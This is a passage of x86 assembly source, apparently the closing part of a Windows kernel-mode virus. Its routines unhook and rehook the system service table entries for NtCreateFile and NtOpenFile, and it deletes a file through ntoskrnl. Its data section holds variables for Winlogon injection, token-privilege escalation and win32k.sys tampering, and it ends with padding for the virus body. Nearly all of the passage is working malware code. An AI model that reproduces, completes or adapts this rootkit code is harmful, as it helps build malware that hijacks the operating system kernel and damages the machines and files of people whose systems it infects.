mov eax,[ebp + Ntoskrnl]
GezApi eax,ZwDeleteFileCRC,ZDFNameLen
call eax  ;file must be deleted

popad
popfd

ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;UnhookWhile and RehookAgain put off and put on the hook
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;NtCreateFileAddr			
;NtOpenFileAddr               
;NtCreateFileEntryAddr		
;NtOpenFileEntryAddr		

;;;;;;;;;;;;;;;;;;;;;;
UnhookWhile:
;;;;;;;;;;;;
pushad
mov eax,[ebp + NtCreateFileAddr]
mov ebx,[ebp + NtCreateFileEntryAddr]
mov [ebx],eax
mov eax,[ebp + NtOpenFileAddr]
mov ebx,[ebp + NtOpenFileEntryAddr]
mov [ebx],eax
popad
ret
;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;
RehookAgain:
;;;;;;;;;;;;
pushad
lea eax,[ebp + NtCreateFileHookRutine]
mov ebx,[ebp + NtCreateFileEntryAddr]
mov [ebx],eax
lea eax,[ebp + NtOpenFileHookRutine]
mov ebx,[ebp + NtOpenFileEntryAddr]
mov [ebx],eax
popad
ret
;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Some Variables

Needed     dd 0
NtKernel   dd 0
NtAdvapi   dd 0
NtPsapi    dd 0
NtRasapi   dd 0
Ntdll      dd 0
NtImagehlp dd 0
advapi     db 'advapi32.dll',0
psapi      db 'psapi.dll',0
rasapi     db 'rasapi32.dll',0
imagehlp   db 'imagehlp.dll',0
win32ksys  db 'win32k.sys',0
win32ksy   db 'win32k.sy',0
win32kfuck db 'win32k.fuck',0
StartUnicode db '\',0,'?',0,'?',0,'\',0
WinlogonHand  dd 0
WinlogonID    dd 0
WinlogonModuleHand dd 0
WinlogonModuleName db 50 dup(?)
WinlogonVirusBase  dd 0

tAdjustTokenPrivileges dd 0
tCloseHandle           dd 0
tLookupPrivilegeValueA dd 0
tOpenProcessToken      dd 0
tGetCurrentProcess     dd 0

CurDir db 256 dup(0)

_WIN32_FIND_DATA WIN32_FIND_DATA ?

FileHandle          dd 0
MappingHandle       dd 0
ViewHandle          dd 0
SearchHand          dd 0

Buffer              db 256 dup (?)
aux                 dd 0
KernelThreadHand    dd 0

EntryPointWin32ksys dd 0
EntryPoint          dd 0

KeServiceDescriptorTable      dd 0
Ntoskrnl   				dd 0
SSDT				      dd 0
NtCreateFileAddr			dd 0
NtOpenFileAddr                dd 0
NtCreateFileEntryAddr		dd 0
NtOpenFileEntryAddr		dd 0

AttributesFileRing0         dd             ?
CreateDispositionFileRing0  dd             ?
CreateOptionsFileRing0      dd             ?
FileNameRing0 		unicode_string     ? 
StringRing0             dw    256      dup(0)      
RootDirectoryRing0	dd 			 0
FileAttributesRing0     objects_attributes ?
io_statusRing0          pio_status         ?
FileHandRing0	      dd 			 ?
SectionHandRing0		dd                 ?
SectionOffsetRing0      dq                 0
SectionBaseAddressRing0 dd                 0
SectionViewSizeRing0    dd                 0


ZwMapViewOfSectionz     dd                 0
ZwCreateSectionz        dd                 0
ZwOpenFilez             dd                 0
ZwUnmapViewOfSectionz   dd                 0
ZwClosez                dd                 0

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
padding:
PADDING equ  4 -(((padding - svirus) - (4*((padding - svirus)/4))))
db PADDING dup (00h)

evirus:
end start

end